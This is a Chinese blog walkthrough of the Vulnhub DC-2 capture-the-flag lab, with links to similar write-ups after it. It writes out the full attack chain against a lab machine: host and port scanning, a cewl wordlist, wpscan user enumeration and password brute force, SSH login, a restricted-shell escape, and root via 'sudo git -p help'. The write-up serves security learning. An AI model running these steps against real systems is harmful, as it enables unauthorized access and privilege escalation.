渗透测试学习之靶机DC-2

最新推荐文章于 2024-07-14 18:59:44 发布
最新推荐文章于 2024-07-14 18:59:44 发布
阅读量530 收藏 21
点赞数 5
分类专栏: 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44426869/article/details/104763473
版权
前言
  • 之前的过程写得感觉太过于累赘,这个就直接顺着思路写吧。
过程
1. 探测目标主机

nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.139
在这里插入图片描述

2. 信息搜集
  • 端口信息
    nmap -sV -p 1-65535 192.168.246.139
    在这里插入图片描述
  • web站点的相关服务信息
    whatweb http://192.168.246.139:80
    在这里插入图片描述
    在这里插入图片描述
    打开该地址后也是,RedirectLocation也就是跳转到http://dc-2/,修改hosts文件,让此域名解析到靶机的IP地址。
    C:\Windows\System32\drivers\etc的hosts增加192.168.246.139 dc-2
    保存后重新打开此地址:
    在这里插入图片描述
    wordpress站,同时得到Flag1:
    在这里插入图片描述
    大概意思是:普通字典可能没用,可以使用cewl获取字典代替,登录一个获取下一个flag,没有就登录下一个,存在多个用户。
  • 使用cewl生成字典
    没有其他提示,使用默认方法就行:
    cewl http://dc-2/ -w /root/Desktop/dic.txt
    在这里插入图片描述
    这就有了密码字典。
  • 使用wpscan枚举用户名
    wpscan --url http://dc-2/ -e u
    在这里插入图片描述
    把这三个也放到一个文本里吧。
  • 站点目录信息
    使用dirbuster,配置如下:
    在这里插入图片描述
    在这里插入图片描述
    访问后跳转到:http://dc-2/wp-login.php,得到后台登录地址。
3. 爆破用户

使用wpscan对之前的用户名密码字典进行爆破
wpscan --url http://dc-2/ -P /root/Desktop/dic.txt -U /root/Desktop/user.txt
在这里插入图片描述

4. 后台登录
  • 登录jerry
    在Pages里看到Flag和Flag2:
    在这里插入图片描述
    Flag就是Flag1的内容,Flag2:
    在这里插入图片描述
    提示另一个方式,除了WordPress,那只有ssh的7744端口。
  • 登录tom
    什么信息也没有,只能转向ssh。
5. ssh登录

使用jerry登录失败,tom登录成功:
在这里插入图片描述
查看目录文件,存在flag3.txt,但是命令不能执行;

因为ssh远程连接到服务器的环境变量中不包含对应可执行文件的路径。需要自行添加
引用链接

需要绕过rbash

BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

在这里插入图片描述
flag3:Perhaps he should su for all the stress he causes.
看了引用链接中的大佬的思路,切换用户,su。

6. 切换用户

切换用户,跳出tom所在目录后发现flag4.txt:
su jerry
在这里插入图片描述
flag4:Go on - git outta here!!!

  • git 提示使用git提权
7. git提权

参考链接
sudo git -p help
!/bin/bash
这里刚开始一直失败,后来找到原因如下:

这里需要调整终端大小,使其一次性显示不完这条命令的回显结果,这样这条命令就一直处于运行状态,加上此时处于root权限。
引用链接

在这里插入图片描述
跳出jerry目录,就可以发现final-flag.txt了:
在这里插入图片描述

总结
  • 过程磕磕绊绊,但是认识到很多,需要及时复习;
  • 参考的地方都有在文章中指出。
wxlblh
关注
专栏目录
渗透测试靶机DC-2
prettyX的博客
11-28 581
新的学习之旅开始了 goGoGO! 1、环境搭建: 靶机下载地址:http://www.five86.com/ 虚拟机:VirtualBox 2、渗透测试: 对于靶机DC-2的介绍,需要修改host文件 DC2运行界面 Kali下,arp-scan -l,用于局域网主机发现 nmap扫描目标网络端口服务,目标只开放了80端口 其实,除了80端口,还有7744端口 ...
DC-2 靶机
weixin_63492470的博客
03-11 5470
DC-2靶机下载地址: DC-2 | Five86 | DC Challenges 环境:DC-2靶机地址:192.168.1.139 nmap -sP 192.168.1.0/24 查看ip nmap -A 192.168.1.139 #这里我的靶机IP是132 dirb 192.168.1.139 爆破目录 这里查出了靶机IP为192.168.1.139 靶机开放了80端口和7744端口、 然后访问192.168.1.139发现是这个界面,什么也没有看到..
DC-2靶机渗透学习记录
最新发布
tyut_dummy的博客
07-14 1936
1)根据flag3提示,我们应该进行提权,切换为jerry用户,但是shell被限制了,于是我们需要绕过rbash,然后设置环境变量,最终成功su jerry。1)根据flag2提示,我们要去寻找其他攻击渗透点,所以我们把目光放到靶机的第二个端口7744端口。打开了一个shell(部分功能依旧不可用),进入/home/jerry目录下查看文件flag4.txt。1)根据flag1提示,我们使用cewl工具,提取网页中关键词,生成密码字典。3)进入/root目录查看最终flag文件,完成DC-2靶机渗透。
Vulnhub靶机实战——DC-2
冠霖L的博客
09-27 4800
靶机DC-2下载地址:https://download.vulnhub.com/dc/DC-2.zip 描述:靶机DC-2与DC-1一样,共有5个flag,但最终需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.132 Kali的IP地址:192.168.22...
DC-2靶机攻略
真正的大师,永远都怀着一颗学徒的心。
07-25 774
文章目录前言一、DC-2 收集信息1.确定目标IP,以及端口号2.进入登陆界面二、使用步骤1.引入库2.读入数据总结 前言 之前进行了DC-1的攻略有兴趣的可以点击去看一下 提示:以下是本篇文章正文内容,下面案例可供参考 一、DC-2 收集信息 简单介绍:这次的靶机渗透是一个找寻DC-2靶机中的flag的过程,以最终的flag为目标。 1.确定目标IP,以及端口号 通过nmap -sP扫描网段最终确定IP为192.168.48.132,端口号开放80、7744。 2.进入登陆界面 二、使用步骤 1.引
靶机DC-8(详细渗透,适合新手渗透)
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
[渗透测试篇]Vulnhub之靶机DC-2
qq_43668710的博客
05-11 689
文章目录靶机描述实验环境渗透思路获取目标IP(netdiscover)端口扫描(nmap)生成密码(cewl)获取用户名(wpscan)暴力破解(hydra)登录后台全端口扫描/SSH登录逃脱受限shell/导入$PATHgit 提权知识总结DC-系列 靶机描述 共有五个标志,包括最终标志.任务就是跟着逐一放出的flag提示拿到最终的flag. 实验环境 攻击机:kali 目标机:DC-2 涉及工具: 'netdiscover':获取目标IP 'nmap':信息收集/端口扫描/Web服务判断 'cewl
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
渗透测试靶机练习 DC-2
weixin_43705814的博客
12-30 329
渗透测试靶机练习 DC-2 一、靶机介绍 与之前的DC-1靶机是一个系列可在该网站下载搭建 链接:https://www.vulnhub.com/ 二、搭建靶机 直接下载靶机在导入到虚拟机中即可 三、渗透测试获取Flag 1.打开靶机看是都能够正常运行 2.发现Flag 2.1flag1 2.1.1 应为处在同一个局域网中可以使用nmap进行主机发现,进行端口扫描 nmap 10.10.10.0/24 nmap -sV -Pn -p- -O -sS -A 10.10.10.136 ...
DC2-靶机
Au
08-19 1752
下载地址 我配置的环境: kali:192.168.25.131 DC2 -靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机 192.168.25.128,判定为DC2-靶机,继续使用nmap获取详细信息 nmap -A -p 1-65535 192.1...
DC-2靶机
m0_62094846的博客
01-29 3457
前面做法和DC-1差不多,信息收集 ifconfig nmap 192.168.61.0/24 输入IP后会跳转域名,但是无法访问页面 发现问题是本地无法解析域名dc-2(看的别人的解释) 要配置可以解析的文件 在命令行中输入 vim /etc/hosts (修改配置文件需要root权限) 要在虚拟机中输入IP才可以,因为文件是在虚拟机配置的 flag1: 提示爆破字典只需要cewl产生的字典即可,并且可能可以爆破出两个不同的账号,可能一个无效 ...
靶机DC-2
weixin_43940853的博客
11-18 220
目标靶机 : 192.168.230.228 kali : 192.168.230.226 发现是wordpress,考虑wpscan 点击flag,根据提示,需要用到cewl 简单的讲,这个工具是利用页面爬取深度生成字典的一个工具 wpscan -u http://dc-2 -eu -et -ep 利用wpscan扫一下用户名(一开始我以为用户名和密码都能扫出来,-ep还以为是passwo...
靶机 DC-2
m0_66299232的博客
09-13 1041
rbash是什么?rbash与一般shell的区别在于会限制一些行为,让一些命令无法执行。1>如何设置一个rbashcp /bin/bash /bin/rbash # 复制一个bash,重命名为rbashmkdir -p /home/test/.bin # 在test用户下新建一个.bin目录存放可以执行的命令2>rbash提权export -p //查看环境变量a //把/bin/sh给a/bin/bash。
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试的实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值